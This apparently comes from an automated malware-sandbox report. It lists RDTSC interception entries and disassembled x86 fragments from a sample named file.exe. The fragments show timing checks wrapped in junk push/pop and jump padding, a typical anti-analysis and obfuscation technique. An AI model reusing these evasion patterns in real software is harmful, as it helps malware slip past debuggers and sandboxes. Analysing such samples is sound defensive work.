              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6287 second address: CD62B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F055C7C832Dh 0x0000000f jmp 00007F055C7C8331h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F055C7C8326h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7476 second address: CD7491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637C7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC1ED second address: CDC203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE057C second address: CE058A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 je 00007F055D0637C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE058A second address: CE0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC3D second address: CDFC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jne 00007F055D0637B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFD81 second address: CDFD85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE41FD second address: CE4219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F055D0637BFh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4219 second address: CE4224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F055C7C8326h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4224 second address: CE422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB7FE second address: CEB804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB804 second address: CEB81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BCh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F055D0637B6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA441 second address: CEA47E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055C7C8333h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F055C7C832Eh 0x00000011 jnp 00007F055C7C8326h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007F055C7C833Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA47E second address: CEA482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA482 second address: CEA486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEAB49 second address: CEAB4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEAB4F second address: CEAB56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEAB56 second address: CEAB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F055D0637B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEACE9 second address: CEACEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB18A second address: CEB195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB319 second address: CEB34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F055C7C8337h 0x0000000a jmp 00007F055C7C8333h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB4D8 second address: CEB4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB4DE second address: CEB511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 jc 00007F055C7C833Ah 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F055C7C8332h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB511 second address: CEB517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB6A7 second address: CEB6B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF37A9 second address: CF37B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38F7 second address: CF38FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38FB second address: CF391D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 jmp 00007F055D0637BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF391D second address: CF392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055C7C8326h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3C15 second address: CF3C1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3C1F second address: CF3C26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3C26 second address: CF3C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F055D0637C9h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF41B1 second address: CF41CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F055C7C8336h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF41CF second address: CF41D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF45C4 second address: CF45C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF45C8 second address: CF45CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA26DE second address: CA26E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA26E4 second address: CA26EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA26EA second address: CA270C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F055C7C8326h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jg 00007F055C7C834Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA270C second address: CA2716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F055D0637B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78208 second address: C7820F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7820F second address: C7821E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 jp 00007F055D0637B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7821E second address: C7823A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F055C7C8330h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7823A second address: C78247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055D0637B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3346 second address: CF3386 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F055C7C8335h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F055C7C8353h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F055C7C8335h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3386 second address: CF338C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76766 second address: C76770 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76770 second address: C76775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76775 second address: C7678C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C8331h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF910A second address: CF9122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9122 second address: CF9136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F055C7C832Ah 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5E83 second address: CC5E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5F88 second address: CC5F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055C7C832Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6459 second address: B0F97F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, 0618DC61h 0x00000011 push dword ptr [ebp+122D008Dh] 0x00000017 sub dl, 00000022h 0x0000001a mov edi, dword ptr [ebp+1244A7EAh] 0x00000020 call dword ptr [ebp+122D1C62h] 0x00000026 pushad 0x00000027 jmp 00007F055D0637C1h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov eax, ecx 0x00000031 mov dword ptr [ebp+122D1A5Bh], eax 0x00000037 popad 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D2C59h], eax 0x00000043 mov dword ptr [ebp+122D1A5Bh], eax 0x00000049 mov esi, 0000003Ch 0x0000004e jbe 00007F055D0637C3h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D2EEFh], eax 0x0000005e lodsw 0x00000060 jmp 00007F055D0637BBh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D2EEFh], esi 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jo 00007F055D0637BCh 0x00000079 mov dword ptr [ebp+122D1C80h], ecx 0x0000007f nop 0x00000080 jno 00007F055D0637C9h 0x00000086 push eax 0x00000087 push ecx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6778 second address: CC6785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6785 second address: CC6797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC358F second address: CC3595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC691E second address: CC6924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6924 second address: CC6928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6FEA second address: CC6FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC709D second address: CC7149 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F055C7C8336h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F055C7C8335h 0x00000012 jmp 00007F055C7C832Fh 0x00000017 nop 0x00000018 mov ecx, 0C251AA3h 0x0000001d or cl, FFFFFFF1h 0x00000020 lea eax, dword ptr [ebp+12489BD8h] 0x00000026 mov edi, dword ptr [ebp+122D2B89h] 0x0000002c adc edi, 145E16AFh 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F055C7C8338h 0x00000039 push eax 0x0000003a pushad 0x0000003b popad 0x0000003c pop eax 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F055C7C8328h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b cmc 0x0000005c mov ecx, dword ptr [ebp+124599E8h] 0x00000062 lea eax, dword ptr [ebp+12489B94h] 0x00000068 mov dl, al 0x0000006a push eax 0x0000006b jng 00007F055C7C8334h 0x00000071 push eax 0x00000072 push edx 0x00000073 jp 00007F055C7C8326h 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7149 second address: CA26DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D2AF1h] 0x0000000f call dword ptr [ebp+1244A4F8h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F055D0637CAh 0x0000001d jmp 00007F055D0637C4h 0x00000022 push edi 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop edi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD6B7 second address: CFD6D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F055C7C832Bh 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD6D6 second address: CFD707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jp 00007F055D0637D1h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD85B second address: CFD895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 jo 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F055C7C8336h 0x00000015 jo 00007F055C7C8326h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDDB8 second address: CFDDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F055D0637BFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDEFC second address: CFDF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8336h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F055C7C8337h 0x0000000f jmp 00007F055C7C8339h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE094 second address: CFE09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE09A second address: CFE0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F055C7C8326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02822 second address: D0284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BDh 0x00000009 jmp 00007F055D0637C7h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0284F second address: D02853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02853 second address: D02859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02859 second address: D02877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02877 second address: D0287B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0287B second address: D02896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F055C7C832Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02A0C second address: D02A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02D1B second address: D02D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02D26 second address: D02D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02E8C second address: D02E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0838E second address: D083A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jo 00007F055D0637B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D084EE second address: D08543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F055C7C8326h 0x0000000a popad 0x0000000b jg 00007F055C7C832Eh 0x00000011 jmp 00007F055C7C8336h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop ebx 0x0000001d push esi 0x0000001e jmp 00007F055C7C832Dh 0x00000023 jmp 00007F055C7C8330h 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08543 second address: D08557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08557 second address: D08563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F055C7C8326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E474 second address: D0E4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C9h 0x00000007 pushad 0x00000008 jmp 00007F055D0637C6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F055D0637C3h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jl 00007F055D0637B6h 0x00000024 pop edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E4CC second address: D0E4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F055C7C8326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E924 second address: D0E950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pushad 0x00000008 jns 00007F055D0637B6h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
